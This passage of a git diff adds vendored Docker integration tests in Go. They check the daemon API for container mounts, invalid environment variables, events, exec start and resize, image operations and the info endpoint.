destPath}}}, + } + status, resp, err := sockRequest("POST", "/containers/create?name=test", data) + c.Assert(err, checker.IsNil, check.Commentf(string(resp))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(resp))) + + out, _ := dockerCmd(c, "start", "-a", "test") + c.Assert(out, checker.Equals, "hello") +} + +// Test Mounts comes out as expected for the MountPoint +func (s *DockerSuite) TestContainersAPICreateMountsCreate(c *check.C) { + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + destPath := prefix + slash + "foo" + + var ( + err error + testImg string + ) + if daemonPlatform != "windows" { + testImg, err = buildImage("test-mount-config", ` + FROM busybox + RUN mkdir `+destPath+` && touch `+destPath+slash+`bar + CMD cat `+destPath+slash+`bar + `, true) + } else { + testImg = "busybox" + } + c.Assert(err, checker.IsNil) + + type testCase struct { + 
cfg mounttypes.Mount + expected types.MountPoint + } + + cases := []testCase{ + // use literal strings here for `Type` instead of the defined constants in the volume package to keep this honest + // Validation of the actual `Mount` struct is done in another test is not needed here + {mounttypes.Mount{Type: "volume", Target: destPath}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath + slash}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test1"}, types.MountPoint{Type: "volume", Name: "test1", RW: true, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath, ReadOnly: true, Source: "test2"}, types.MountPoint{Type: "volume", Name: "test2", RW: false, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test3", VolumeOptions: &mounttypes.VolumeOptions{DriverConfig: &mounttypes.Driver{Name: volume.DefaultDriverName}}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", Name: "test3", RW: true, Destination: destPath}}, + } + + if SameHostDaemon.Condition() { + // setup temp dir for testing binds + tmpDir1, err := ioutil.TempDir("", "test-mounts-api-1") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir1) + cases = append(cases, []testCase{ + {mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath}, types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir1}}, + {mounttypes.Mount{Type: "bind", Source: tmpDir1, Target: destPath, ReadOnly: true}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir1}}, + }...) 
+ + // for modes only supported on Linux + if DaemonIsLinux.Condition() { + tmpDir3, err := ioutils.TempDir("", "test-mounts-api-3") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(tmpDir3) + + c.Assert(mount.Mount(tmpDir3, tmpDir3, "none", "bind,rw"), checker.IsNil) + c.Assert(mount.ForceMount("", tmpDir3, "none", "shared"), checker.IsNil) + + cases = append(cases, []testCase{ + {mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath}, types.MountPoint{Type: "bind", RW: true, Destination: destPath, Source: tmpDir3}}, + {mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3}}, + {mounttypes.Mount{Type: "bind", Source: tmpDir3, Target: destPath, ReadOnly: true, BindOptions: &mounttypes.BindOptions{Propagation: "shared"}}, types.MountPoint{Type: "bind", RW: false, Destination: destPath, Source: tmpDir3, Propagation: "shared"}}, + }...) + } + } + + if daemonPlatform != "windows" { // Windows does not support volume populate + cases = append(cases, []testCase{ + {mounttypes.Mount{Type: "volume", Target: destPath, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath + slash, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Driver: volume.DefaultDriverName, Type: "volume", RW: true, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test4", VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Type: "volume", Name: "test4", RW: true, Destination: destPath}}, + {mounttypes.Mount{Type: "volume", Target: destPath, Source: "test5", ReadOnly: true, VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, types.MountPoint{Type: "volume", Name: "test5", RW: false, Destination: destPath}}, + }...) 
+ } + + type wrapper struct { + containertypes.Config + HostConfig containertypes.HostConfig + } + type createResp struct { + ID string `json:"Id"` + } + for i, x := range cases { + c.Logf("case %d - config: %v", i, x.cfg) + status, data, err := sockRequest("POST", "/containers/create", wrapper{containertypes.Config{Image: testImg}, containertypes.HostConfig{Mounts: []mounttypes.Mount{x.cfg}}}) + c.Assert(err, checker.IsNil, check.Commentf(string(data))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(data))) + + var resp createResp + err = json.Unmarshal(data, &resp) + c.Assert(err, checker.IsNil, check.Commentf(string(data))) + id := resp.ID + + var mps []types.MountPoint + err = json.NewDecoder(strings.NewReader(inspectFieldJSON(c, id, "Mounts"))).Decode(&mps) + c.Assert(err, checker.IsNil) + c.Assert(mps, checker.HasLen, 1) + c.Assert(mps[0].Destination, checker.Equals, x.expected.Destination) + + if len(x.expected.Source) > 0 { + c.Assert(mps[0].Source, checker.Equals, x.expected.Source) + } + if len(x.expected.Name) > 0 { + c.Assert(mps[0].Name, checker.Equals, x.expected.Name) + } + if len(x.expected.Driver) > 0 { + c.Assert(mps[0].Driver, checker.Equals, x.expected.Driver) + } + c.Assert(mps[0].RW, checker.Equals, x.expected.RW) + c.Assert(mps[0].Type, checker.Equals, x.expected.Type) + c.Assert(mps[0].Mode, checker.Equals, x.expected.Mode) + if len(x.expected.Propagation) > 0 { + c.Assert(mps[0].Propagation, checker.Equals, x.expected.Propagation) + } + + out, _, err := dockerCmdWithError("start", "-a", id) + if (x.cfg.Type != "volume" || (x.cfg.VolumeOptions != nil && x.cfg.VolumeOptions.NoCopy)) && daemonPlatform != "windows" { + c.Assert(err, checker.NotNil, check.Commentf("%s\n%v", out, mps[0])) + } else { + c.Assert(err, checker.IsNil, check.Commentf("%s\n%v", out, mps[0])) + } + + dockerCmd(c, "rm", "-fv", id) + if x.cfg.Type == "volume" && len(x.cfg.Source) > 0 { + // This should still exist even though we removed the 
container + dockerCmd(c, "volume", "inspect", mps[0].Name) + } else { + // This should be removed automatically when we removed the container + out, _, err := dockerCmdWithError("volume", "inspect", mps[0].Name) + c.Assert(err, checker.NotNil, check.Commentf(out)) + } + } +} + +func (s *DockerSuite) TestContainersAPICreateMountsTmpfs(c *check.C) { + testRequires(c, DaemonIsLinux) + type testCase struct { + cfg map[string]interface{} + expectedOptions []string + } + target := "/foo" + cases := []testCase{ + { + cfg: map[string]interface{}{ + "Type": "tmpfs", + "Target": target}, + expectedOptions: []string{"rw", "nosuid", "nodev", "noexec", "relatime"}, + }, + { + cfg: map[string]interface{}{ + "Type": "tmpfs", + "Target": target, + "TmpfsOptions": map[string]interface{}{ + "SizeBytes": 4096 * 1024, "Mode": 0700}}, + expectedOptions: []string{"rw", "nosuid", "nodev", "noexec", "relatime", "size=4096k", "mode=700"}, + }, + } + + for i, x := range cases { + cName := fmt.Sprintf("test-tmpfs-%d", i) + data := map[string]interface{}{ + "Image": "busybox", + "Cmd": []string{"/bin/sh", "-c", + fmt.Sprintf("mount | grep 'tmpfs on %s'", target)}, + "HostConfig": map[string]interface{}{"Mounts": []map[string]interface{}{x.cfg}}, + } + status, resp, err := sockRequest("POST", "/containers/create?name="+cName, data) + c.Assert(err, checker.IsNil, check.Commentf(string(resp))) + c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf(string(resp))) + out, _ := dockerCmd(c, "start", "-a", cName) + for _, option := range x.expectedOptions { + c.Assert(out, checker.Contains, option) + } + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go new file mode 100644 index 0000000000..41011c3157 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_create_test.go @@ -0,0 +1,84 @@ +package main + +import ( + "net/http" + + 
"github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestAPICreateWithNotExistImage(c *check.C) { + name := "test" + config := map[string]interface{}{ + "Image": "test456:v1", + "Volumes": map[string]struct{}{"/tmp": {}}, + } + + status, body, err := sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusNotFound) + expected := "No such image: test456:v1" + c.Assert(getErrorMessage(c, body), checker.Contains, expected) + + config2 := map[string]interface{}{ + "Image": "test456", + "Volumes": map[string]struct{}{"/tmp": {}}, + } + + status, body, err = sockRequest("POST", "/containers/create?name="+name, config2) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusNotFound) + expected = "No such image: test456:latest" + c.Assert(getErrorMessage(c, body), checker.Equals, expected) + + config3 := map[string]interface{}{ + "Image": "sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa", + } + + status, body, err = sockRequest("POST", "/containers/create?name="+name, config3) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusNotFound) + expected = "No such image: sha256:0cb40641836c461bc97c793971d84d758371ed682042457523e4ae701efeaaaa" + c.Assert(getErrorMessage(c, body), checker.Equals, expected) + +} + +// Test for #25099 +func (s *DockerSuite) TestAPICreateEmptyEnv(c *check.C) { + name := "test1" + config := map[string]interface{}{ + "Image": "busybox", + "Env": []string{"", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}, + "Cmd": []string{"true"}, + } + + status, body, err := sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + expected := "invalid environment variable:" + c.Assert(getErrorMessage(c, body), checker.Contains, expected) + + name = 
"test2" + config = map[string]interface{}{ + "Image": "busybox", + "Env": []string{"=", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}, + "Cmd": []string{"true"}, + } + status, body, err = sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + expected = "invalid environment variable: =" + c.Assert(getErrorMessage(c, body), checker.Contains, expected) + + name = "test3" + config = map[string]interface{}{ + "Image": "busybox", + "Env": []string{"=foo", "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"}, + "Cmd": []string{"true"}, + } + status, body, err = sockRequest("POST", "/containers/create?name="+name, config) + c.Assert(err, check.IsNil) + c.Assert(status, check.Equals, http.StatusInternalServerError) + expected = "invalid environment variable: =foo" + c.Assert(getErrorMessage(c, body), checker.Contains, expected) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go new file mode 100644 index 0000000000..3891c87379 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go @@ -0,0 +1,73 @@ +package main + +import ( + "encoding/json" + "io" + "net/http" + "net/url" + "strconv" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/jsonmessage" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestEventsAPIEmptyOutput(c *check.C) { + type apiResp struct { + resp *http.Response + err error + } + chResp := make(chan *apiResp) + go func() { + resp, body, err := sockRequestRaw("GET", "/events", nil, "") + body.Close() + chResp <- &apiResp{resp, err} + }() + + select { + case r := <-chResp: + c.Assert(r.err, checker.IsNil) + c.Assert(r.resp.StatusCode, checker.Equals, http.StatusOK) + case <-time.After(3 * time.Second): + 
c.Fatal("timeout waiting for events api to respond, should have responded immediately") + } +} + +func (s *DockerSuite) TestEventsAPIBackwardsCompatible(c *check.C) { + since := daemonTime(c).Unix() + ts := strconv.FormatInt(since, 10) + + out, _ := runSleepingContainer(c, "--name=foo", "-d") + containerID := strings.TrimSpace(out) + c.Assert(waitRun(containerID), checker.IsNil) + + q := url.Values{} + q.Set("since", ts) + + _, body, err := sockRequestRaw("GET", "/events?"+q.Encode(), nil, "") + c.Assert(err, checker.IsNil) + defer body.Close() + + dec := json.NewDecoder(body) + var containerCreateEvent *jsonmessage.JSONMessage + for { + var event jsonmessage.JSONMessage + if err := dec.Decode(&event); err != nil { + if err == io.EOF { + break + } + c.Fatal(err) + } + if event.Status == "create" && event.ID == containerID { + containerCreateEvent = &event + break + } + } + + c.Assert(containerCreateEvent, checker.Not(checker.IsNil)) + c.Assert(containerCreateEvent.Status, checker.Equals, "create") + c.Assert(containerCreateEvent.ID, checker.Equals, containerID) + c.Assert(containerCreateEvent.From, checker.Equals, "busybox") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go new file mode 100644 index 0000000000..cf4dded483 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_resize_test.go @@ -0,0 +1,103 @@ +package main + +import ( + "bytes" + "encoding/json" + "fmt" + "io" + "net/http" + "strings" + "sync" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestExecResizeAPIHeightWidthNoInt(c *check.C) { + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + cleanedContainerID := strings.TrimSpace(out) + + endpoint := "/exec/" + cleanedContainerID + "/resize?h=foo&w=bar" + status, _, err := sockRequest("POST", 
endpoint, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) +} + +// Part of #14845 +func (s *DockerSuite) TestExecResizeImmediatelyAfterExecStart(c *check.C) { + name := "exec_resize_test" + dockerCmd(c, "run", "-d", "-i", "-t", "--name", name, "--restart", "always", "busybox", "/bin/sh") + + testExecResize := func() error { + data := map[string]interface{}{ + "AttachStdin": true, + "Cmd": []string{"/bin/sh"}, + } + uri := fmt.Sprintf("/containers/%s/exec", name) + status, body, err := sockRequest("POST", uri, data) + if err != nil { + return err + } + if status != http.StatusCreated { + return fmt.Errorf("POST %s is expected to return %d, got %d", uri, http.StatusCreated, status) + } + + out := map[string]string{} + err = json.Unmarshal(body, &out) + if err != nil { + return fmt.Errorf("ExecCreate returned invalid json. Error: %q", err.Error()) + } + + execID := out["Id"] + if len(execID) < 1 { + return fmt.Errorf("ExecCreate got invalid execID") + } + + payload := bytes.NewBufferString(`{"Tty":true}`) + conn, _, err := sockRequestHijack("POST", fmt.Sprintf("/exec/%s/start", execID), payload, "application/json") + if err != nil { + return fmt.Errorf("Failed to start the exec: %q", err.Error()) + } + defer conn.Close() + + _, rc, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/resize?h=24&w=80", execID), nil, "text/plain") + // It's probably a panic of the daemon if io.ErrUnexpectedEOF is returned. + if err == io.ErrUnexpectedEOF { + return fmt.Errorf("The daemon might have crashed.") + } + + if err == nil { + rc.Close() + } + + // We only interested in the io.ErrUnexpectedEOF error, so we return nil otherwise. + return nil + } + + // The panic happens when daemon.ContainerExecStart is called but the + // container.Exec is not called. + // Because the panic is not 100% reproducible, we send the requests concurrently + // to increase the probability that the problem is triggered. 
+ var ( + n = 10 + ch = make(chan error, n) + wg sync.WaitGroup + ) + for i := 0; i < n; i++ { + wg.Add(1) + go func() { + defer wg.Done() + if err := testExecResize(); err != nil { + ch <- err + } + }() + } + + wg.Wait() + select { + case err := <-ch: + c.Fatal(err.Error()) + default: + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go new file mode 100644 index 0000000000..716e9ac68f --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_exec_test.go @@ -0,0 +1,198 @@ +// +build !test_no_exec + +package main + +import ( + "bytes" + "encoding/json" + "fmt" + "net/http" + "strings" + "time" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// Regression test for #9414 +func (s *DockerSuite) TestExecAPICreateNoCmd(c *check.C) { + name := "exec_test" + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + + status, body, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": nil}) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError) + + comment := check.Commentf("Expected message when creating exec command with no Cmd specified") + c.Assert(getErrorMessage(c, body), checker.Contains, "No exec command specified", comment) +} + +func (s *DockerSuite) TestExecAPICreateNoValidContentType(c *check.C) { + name := "exec_test" + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + + jsonData := bytes.NewBuffer(nil) + if err := json.NewEncoder(jsonData).Encode(map[string]interface{}{"Cmd": nil}); err != nil { + c.Fatalf("Can not encode data to json %s", err) + } + + res, body, err := sockRequestRaw("POST", fmt.Sprintf("/containers/%s/exec", name), jsonData, "text/plain") + c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusInternalServerError) + 
+ b, err := readBody(body) + c.Assert(err, checker.IsNil) + + comment := check.Commentf("Expected message when creating exec command with invalid Content-Type specified") + c.Assert(getErrorMessage(c, b), checker.Contains, "Content-Type specified", comment) +} + +func (s *DockerSuite) TestExecAPICreateContainerPaused(c *check.C) { + // Not relevant on Windows as Windows containers cannot be paused + testRequires(c, DaemonIsLinux) + name := "exec_create_test" + dockerCmd(c, "run", "-d", "-t", "--name", name, "busybox", "/bin/sh") + + dockerCmd(c, "pause", name) + status, body, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": []string{"true"}}) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusConflict) + + comment := check.Commentf("Expected message when creating exec command with Container %s is paused", name) + c.Assert(getErrorMessage(c, body), checker.Contains, "Container "+name+" is paused, unpause the container before exec", comment) +} + +func (s *DockerSuite) TestExecAPIStart(c *check.C) { + testRequires(c, DaemonIsLinux) // Uses pause/unpause but bits may be salvagable to Windows to Windows CI + dockerCmd(c, "run", "-d", "--name", "test", "busybox", "top") + + id := createExec(c, "test") + startExec(c, id, http.StatusOK) + + var execJSON struct{ PID int } + inspectExec(c, id, &execJSON) + c.Assert(execJSON.PID, checker.GreaterThan, 1) + + id = createExec(c, "test") + dockerCmd(c, "stop", "test") + + startExec(c, id, http.StatusNotFound) + + dockerCmd(c, "start", "test") + startExec(c, id, http.StatusNotFound) + + // make sure exec is created before pausing + id = createExec(c, "test") + dockerCmd(c, "pause", "test") + startExec(c, id, http.StatusConflict) + dockerCmd(c, "unpause", "test") + startExec(c, id, http.StatusOK) +} + +func (s *DockerSuite) TestExecAPIStartEnsureHeaders(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "test", "busybox", 
"top") + + id := createExec(c, "test") + resp, _, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "application/json") + c.Assert(err, checker.IsNil) + c.Assert(resp.Header.Get("Server"), checker.Not(checker.Equals), "") +} + +func (s *DockerSuite) TestExecAPIStartBackwardsCompatible(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + runSleepingContainer(c, "-d", "--name", "test") + id := createExec(c, "test") + + resp, body, err := sockRequestRaw("POST", fmt.Sprintf("/v1.20/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "text/plain") + c.Assert(err, checker.IsNil) + + b, err := readBody(body) + comment := check.Commentf("response body: %s", b) + c.Assert(err, checker.IsNil, comment) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK, comment) +} + +// #19362 +func (s *DockerSuite) TestExecAPIStartMultipleTimesError(c *check.C) { + runSleepingContainer(c, "-d", "--name", "test") + execID := createExec(c, "test") + startExec(c, execID, http.StatusOK) + + timeout := time.After(60 * time.Second) + var execJSON struct{ Running bool } + for { + select { + case <-timeout: + c.Fatal("timeout waiting for exec to start") + default: + } + + inspectExec(c, execID, &execJSON) + if !execJSON.Running { + break + } + } + + startExec(c, execID, http.StatusConflict) +} + +// #20638 +func (s *DockerSuite) TestExecAPIStartWithDetach(c *check.C) { + name := "foo" + runSleepingContainer(c, "-d", "-t", "--name", name) + data := map[string]interface{}{ + "cmd": []string{"true"}, + "AttachStdin": true, + } + _, b, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), data) + c.Assert(err, checker.IsNil, check.Commentf(string(b))) + + createResp := struct { + ID string `json:"Id"` + }{} + c.Assert(json.Unmarshal(b, &createResp), checker.IsNil, check.Commentf(string(b))) + + _, body, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", createResp.ID), 
strings.NewReader(`{"Detach": true}`), "application/json") + c.Assert(err, checker.IsNil) + + b, err = readBody(body) + comment := check.Commentf("response body: %s", b) + c.Assert(err, checker.IsNil, comment) + + resp, _, err := sockRequestRaw("GET", "/_ping", nil, "") + c.Assert(err, checker.IsNil) + if resp.StatusCode != http.StatusOK { + c.Fatal("daemon is down, it should alive") + } +} + +func createExec(c *check.C, name string) string { + _, b, err := sockRequest("POST", fmt.Sprintf("/containers/%s/exec", name), map[string]interface{}{"Cmd": []string{"true"}}) + c.Assert(err, checker.IsNil, check.Commentf(string(b))) + + createResp := struct { + ID string `json:"Id"` + }{} + c.Assert(json.Unmarshal(b, &createResp), checker.IsNil, check.Commentf(string(b))) + return createResp.ID +} + +func startExec(c *check.C, id string, code int) { + resp, body, err := sockRequestRaw("POST", fmt.Sprintf("/exec/%s/start", id), strings.NewReader(`{"Detach": true}`), "application/json") + c.Assert(err, checker.IsNil) + + b, err := readBody(body) + comment := check.Commentf("response body: %s", b) + c.Assert(err, checker.IsNil, comment) + c.Assert(resp.StatusCode, checker.Equals, code, comment) +} + +func inspectExec(c *check.C, id string, out interface{}) { + resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/exec/%s/json", id), nil, "") + c.Assert(err, checker.IsNil) + defer body.Close() + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) + err = json.NewDecoder(body).Decode(out) + c.Assert(err, checker.IsNil) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go new file mode 100644 index 0000000000..b7617eae25 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_images_test.go @@ -0,0 +1,165 @@ +package main + +import ( + "encoding/json" + "net/http" + "net/url" + "strings" + + "github.com/docker/docker/api/types" + 
"github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestAPIImagesFilter(c *check.C) { + name := "utest:tag1" + name2 := "utest/docker:tag2" + name3 := "utest:5000/docker:tag3" + for _, n := range []string{name, name2, name3} { + dockerCmd(c, "tag", "busybox", n) + } + type image types.ImageSummary + getImages := func(filter string) []image { + v := url.Values{} + v.Set("filter", filter) + status, b, err := sockRequest("GET", "/images/json?"+v.Encode(), nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var images []image + err = json.Unmarshal(b, &images) + c.Assert(err, checker.IsNil) + + return images + } + + //incorrect number of matches returned + images := getImages("utest*/*") + c.Assert(images[0].RepoTags, checker.HasLen, 2) + + images = getImages("utest") + c.Assert(images[0].RepoTags, checker.HasLen, 1) + + images = getImages("utest*") + c.Assert(images[0].RepoTags, checker.HasLen, 1) + + images = getImages("*5000*/*") + c.Assert(images[0].RepoTags, checker.HasLen, 1) +} + +func (s *DockerSuite) TestAPIImagesSaveAndLoad(c *check.C) { + // TODO Windows to Windows CI: Investigate further why this test fails. 
+ testRequires(c, Network) + testRequires(c, DaemonIsLinux) + out, err := buildImage("saveandload", "FROM busybox\nENV FOO bar", false) + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + + res, body, err := sockRequestRaw("GET", "/images/"+id+"/get", nil, "") + c.Assert(err, checker.IsNil) + defer body.Close() + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + dockerCmd(c, "rmi", id) + + res, loadBody, err := sockRequestRaw("POST", "/images/load", body, "application/x-tar") + c.Assert(err, checker.IsNil) + defer loadBody.Close() + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + + inspectOut := inspectField(c, id, "Id") + c.Assert(strings.TrimSpace(string(inspectOut)), checker.Equals, id, check.Commentf("load did not work properly")) +} + +func (s *DockerSuite) TestAPIImagesDelete(c *check.C) { + if daemonPlatform != "windows" { + testRequires(c, Network) + } + name := "test-api-images-delete" + out, err := buildImage(name, "FROM busybox\nENV FOO bar", false) + c.Assert(err, checker.IsNil) + id := strings.TrimSpace(out) + + dockerCmd(c, "tag", name, "test:tag1") + + status, _, err := sockRequest("DELETE", "/images/"+id, nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusConflict) + + status, _, err = sockRequest("DELETE", "/images/test:noexist", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound) //Status Codes:404 – no such image + + status, _, err = sockRequest("DELETE", "/images/test:tag1", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) +} + +func (s *DockerSuite) TestAPIImagesHistory(c *check.C) { + if daemonPlatform != "windows" { + testRequires(c, Network) + } + name := "test-api-images-history" + out, err := buildImage(name, "FROM busybox\nENV FOO bar", false) + c.Assert(err, checker.IsNil) + + id := strings.TrimSpace(out) + + status, body, err := sockRequest("GET", "/images/"+id+"/history", nil) + c.Assert(err, 
checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + + var historydata []types.ImageHistory + err = json.Unmarshal(body, &historydata) + c.Assert(err, checker.IsNil, check.Commentf("Error on unmarshal")) + + c.Assert(historydata, checker.Not(checker.HasLen), 0) + c.Assert(historydata[0].Tags[0], checker.Equals, "test-api-images-history:latest") +} + +// #14846 +func (s *DockerSuite) TestAPIImagesSearchJSONContentType(c *check.C) { + testRequires(c, Network) + + res, b, err := sockRequestRaw("GET", "/images/search?term=test", nil, "application/json") + c.Assert(err, check.IsNil) + b.Close() + c.Assert(res.StatusCode, checker.Equals, http.StatusOK) + c.Assert(res.Header.Get("Content-Type"), checker.Equals, "application/json") +} + +// Test case for 30027: image size reported as -1 in v1.12 client against v1.13 daemon. +// This test checks to make sure both v1.12 and v1.13 client against v1.13 daemon get correct `Size` after the fix. +func (s *DockerSuite) TestAPIImagesSizeCompatibility(c *check.C) { + status, b, err := sockRequest("GET", "/images/json", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + var images []types.ImageSummary + err = json.Unmarshal(b, &images) + c.Assert(err, checker.IsNil) + c.Assert(len(images), checker.Not(checker.Equals), 0) + for _, image := range images { + c.Assert(image.Size, checker.Not(checker.Equals), int64(-1)) + } + + type v124Image struct { + ID string `json:"Id"` + ParentID string `json:"ParentId"` + RepoTags []string + RepoDigests []string + Created int64 + Size int64 + VirtualSize int64 + Labels map[string]string + } + status, b, err = sockRequest("GET", "/v1.24/images/json", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusOK) + var v124Images []v124Image + err = json.Unmarshal(b, &v124Images) + c.Assert(err, checker.IsNil) + c.Assert(len(v124Images), checker.Not(checker.Equals), 0) + for _, image := range v124Images { + c.Assert(image.Size, 
checker.Not(checker.Equals), int64(-1)) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go new file mode 100644 index 0000000000..1556099734 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go @@ -0,0 +1,53 @@ +package main + +import ( + "net/http" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestInfoAPI(c *check.C) { + endpoint := "/info" + + status, body, err := sockRequest("GET", endpoint, nil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) + + // always shown fields + stringsToCheck := []string{ + "ID", + "Containers", + "ContainersRunning", + "ContainersPaused", + "ContainersStopped", + "Images", + "LoggingDriver", + "OperatingSystem", + "NCPU", + "OSType", + "Architecture", + "MemTotal", + "KernelVersion", + "Driver", + "ServerVersion", + "SecurityOptions"} + + out := string(body) + for _, linePrefix := range stringsToCheck { + c.Assert(out, checker.Contains, linePrefix) + } +} + +func (s *DockerSuite) TestInfoAPIVersioned(c *check.C) { + testRequires(c, DaemonIsLinux) // Windows only supports 1.25 or later + endpoint := "/v1.20/info" + + status, body, err := sockRequest("GET", endpoint, nil) + c.Assert(status, checker.Equals, http.StatusOK) + c.Assert(err, checker.IsNil) + + out := string(body) + c.Assert(out, checker.Contains, "ExecutionDriver") + c.Assert(out, checker.Contains, "not supported") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go new file mode 100644 index 0000000000..546b224c92 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_inspect_test.go @@ -0,0 +1,183 @@ +package main + +import ( + "encoding/json" + "net/http" + "strings" + + 
